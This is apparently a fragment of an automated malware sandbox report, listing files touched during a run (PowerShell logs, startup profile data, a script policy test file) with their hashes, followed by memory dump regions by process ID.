SHA512e3b416130bea861e54f5b0c756039588653861120a270e9c1f4f4cf7a8218d571a2c51a920418b3c30c1df07953e9e347647a6d495766306391a8890acacb6de
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D51.tmp.txtFilesize
12KB
MD52c4e47e2bc06ce0099dda321f80f76a5
SHA10e8dd61cc8c4c5ecbe5176568398b79a98ecc072
SHA256d394e9b536b218803494ea21000b4adc1d3f34f964fbeb2dc6aeb674a56bb131
SHA512e5580a18338cf67a446121451d03d4708737884861184e3e57d5b636f98e03297f59141d2c71e9f490f3b879433aef41ededda1359cb724155e3252527266b0d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5cb39828f3e88dcdef0a31af592b0f920
SHA1e5fdb5a5180ccb3dd002f0e728a5e697a5bf7537
SHA2565971d81c11931c6e38462e8022b9558d8baccb7e68cfbf114fc0103e3cc38a24
SHA512b2040af92dd7016dcc46b7e65db6c28bd628d8a9ae7d75ab87cc77db5cfadf036330f2b965cc6220cc787012aa7cd7b4d9e18aa96ab17c426bbb7a40577da48b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ffdb23d094fdd84725ff2d6132661cf6
SHA1e4671a15d914d4f8260c201523701cf119256fae
SHA2561f2f343e2092b01c12852bbbe92e95d9d522ce09078e6cd5d261014d905232f3
SHA512213aa076b2491abd9930c2d7dc54a7298c5f0ae75debf7520fa7ccf603a8d61a718e9e0f3ae45f056f7abf66316a1909a9d433fc43424f3d7d18e10d79187a13
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blwbsilr.tv2.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5065659124d9dd348476a53c4fb958bd6
SHA1f183b5807a73a8334168849911c2101265172098
SHA2560d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d
SHA512b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56293ef25ad920b9c7adf9da15f0e998d
SHA133910c56e5f2fb8e28521bfe770e1257f9ae72a2
SHA256fcc663833fc7e9218dd65bd54ac93caadf5da3ecb8a8668656d2ee7fa793f2bc
SHA512c10e21abadce6be50a19c2ada8063a19b6ce0cf7eb0c0214fafd7470ac6da395a4195c237308e6f9be8f0b07af4110fb8afe98f94abef0d2486c48c9f1f6cc50
-
memory/68-243-0x000001C1A6450000-0x000001C1A647A000-memory.dmpFilesize
168KB
-
memory/68-244-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/164-59-0x00000269B4680000-0x00000269B4690000-memory.dmpFilesize
64KB
-
memory/164-79-0x00000269B4680000-0x00000269B4690000-memory.dmpFilesize
64KB
-
memory/164-94-0x00000269B4680000-0x00000269B4690000-memory.dmpFilesize
64KB
-
memory/164-97-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/164-58-0x00000269B4680000-0x00000269B4690000-memory.dmpFilesize
64KB
-
memory/164-56-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/412-251-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/412-247-0x0000027762A80000-0x0000027762AAA000-memory.dmpFilesize
168KB
-
memory/592-214-0x00007FFFF2245000-0x00007FFFF2246000-memory.dmpFilesize
4KB
-
memory/592-203-0x000001A2AFA80000-0x000001A2AFAA3000-memory.dmpFilesize
140KB
-
memory/592-207-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/592-206-0x000001A2AFAB0000-0x000001A2AFADA000-memory.dmpFilesize
168KB
-
memory/640-254-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/640-252-0x000002B30BAD0000-0x000002B30BAFA000-memory.dmpFilesize
168KB
-
memory/644-208-0x00000218BC870000-0x00000218BC89A000-memory.dmpFilesize
168KB
-
memory/644-217-0x00000218BC870000-0x00000218BC89A000-memory.dmpFilesize
168KB
-
memory/644-213-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/744-221-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/744-220-0x0000015341E20000-0x0000015341E4A000-memory.dmpFilesize
168KB
-
memory/856-253-0x0000023B2F060000-0x0000023B2F08A000-memory.dmpFilesize
168KB
-
memory/856-257-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/856-258-0x0000023B2F060000-0x0000023B2F08A000-memory.dmpFilesize
168KB
-
memory/904-238-0x00000294DED00000-0x00000294DED2A000-memory.dmpFilesize
168KB
-
memory/904-232-0x00000294DED00000-0x00000294DED2A000-memory.dmpFilesize
168KB
-
memory/904-237-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/988-235-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/988-234-0x000001C047040000-0x000001C04706A000-memory.dmpFilesize
168KB
-
memory/1096-261-0x00000298A8DF0000-0x00000298A8E1A000-memory.dmpFilesize
168KB
-
memory/1096-264-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/1148-279-0x0000024645460000-0x000002464548A000-memory.dmpFilesize
168KB
-
memory/1148-271-0x0000024645460000-0x000002464548A000-memory.dmpFilesize
168KB
-
memory/1148-274-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/1188-277-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmpFilesize
64KB
-
memory/1188-275-0x000001E943090000-0x000001E9430BA000-memory.dmpFilesize
168KB
-
memory/1204-306-0x00000227C0930000-0x00000227C095A000-memory.dmpFilesize
168KB
-
memory/1292-285-0x0000022FAA890000-0x0000022FAA8BA000-memory.dmpFilesize
168KB
-
memory/1344-290-0x000002A5F7640000-0x000002A5F766A000-memory.dmpFilesize
168KB
-
memory/1352-295-0x000001D4FC3F0000-0x000001D4FC41A000-memory.dmpFilesize
168KB
-
memory/1456-301-0x0000026EB2120000-0x0000026EB214A000-memory.dmpFilesize
168KB
-
memory/2356-191-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmpFilesize
696KB
-
memory/2356-182-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2356-183-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2356-184-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2356-197-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmpFilesize
1.9MB
-
memory/2356-198-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/2356-186-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmpFilesize
1.9MB
-
memory/2560-210-0x00007FF7071F0000-0x00007FF7074B8000-memory.dmpFilesize
2.8MB
-
memory/2804-118-0x00007FF752100000-0x00007FF752156000-memory.dmpFilesize
344KB
-
memory/3912-11-0x00000189BB890000-0x00000189BB906000-memory.dmpFilesize
472KB
-
memory/3912-24-0x00000189BB680000-0x00000189BB690000-memory.dmpFilesize
64KB
-
memory/3912-47-0x00000189BB680000-0x00000189BB690000-memory.dmpFilesize
64KB
-
memory/3912-6-0x00000189BB5B0000-0x00000189BB5D2000-memory.dmpFilesize
136KB
-
memory/3912-51-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/3912-8-0x00000189BB680000-0x00000189BB690000-memory.dmpFilesize
64KB
-
memory/3912-7-0x00000189BB680000-0x00000189BB690000-memory.dmpFilesize
64KB
-
memory/3912-5-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/4240-169-0x00000000061E0000-0x0000000006202000-memory.dmpFilesize
136KB
-
memory/4240-148-0x0000000005C70000-0x0000000005C80000-memory.dmpFilesize
64KB
-
memory/4240-209-0x00000000073E0000-0x0000000007456000-memory.dmpFilesize
472KB
-
memory/4240-187-0x0000000007090000-0x00000000070DB000-memory.dmpFilesize
300KB
-
memory/4240-267-0x0000000073120000-0x000000007380E000-memory.dmpFilesize
6.9MB
-
memory/4240-172-0x0000000006C90000-0x0000000006FE0000-memory.dmpFilesize
3.3MB
-
memory/4240-171-0x0000000006A40000-0x0000000006AA6000-memory.dmpFilesize
408KB
-
memory/4240-170-0x00000000069D0000-0x0000000006A36000-memory.dmpFilesize
408KB
-
memory/4240-311-0x0000000005C70000-0x0000000005C80000-memory.dmpFilesize
64KB
-
memory/4240-161-0x00000000062B0000-0x00000000068D8000-memory.dmpFilesize
6.2MB
-
memory/4240-270-0x0000000005C70000-0x0000000005C80000-memory.dmpFilesize
64KB
-
memory/4240-185-0x0000000007060000-0x000000000707C000-memory.dmpFilesize
112KB
-
memory/4240-163-0x0000000005C70000-0x0000000005C80000-memory.dmpFilesize
64KB
-
memory/4240-145-0x0000000073120000-0x000000007380E000-memory.dmpFilesize
6.9MB
-
memory/4240-147-0x0000000005C20000-0x0000000005C56000-memory.dmpFilesize
216KB
-
memory/4276-142-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmpFilesize
64KB
-
memory/4276-180-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmpFilesize
1.9MB
-
memory/4276-181-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmpFilesize
696KB
-
memory/4276-139-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmpFilesize
64KB
-
memory/4276-136-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/4276-194-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmpFilesize
1.9MB
-
memory/4276-189-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmpFilesize
64KB
-
memory/4276-195-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmpFilesize
64KB
-
memory/4276-199-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/4276-196-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmpFilesize
696KB
-
memory/4276-188-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/4276-179-0x000001BB4EB50000-0x000001BB4EB90000-memory.dmpFilesize
256KB
-
memory/4864-100-0x00007FF75E1D0000-0x00007FF75E498000-memory.dmpFilesize
2.8MB
-
memory/4864-0-0x00007FF75E1D0000-0x00007FF75E498000-memory.dmpFilesize
2.8MB
-
memory/5112-162-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/5112-104-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmpFilesize
9.9MB
-
memory/5112-112-0x000002007ADA0000-0x000002007ADB0000-memory.dmpFilesize
64KB
-
memory/5112-113-0x000002007ADA0000-0x000002007ADB0000-memory.dmpFilesize
64KB
-
memory/5112-150-0x000002007ADA0000-0x000002007ADB0000-memory.dmpFilesize
64KB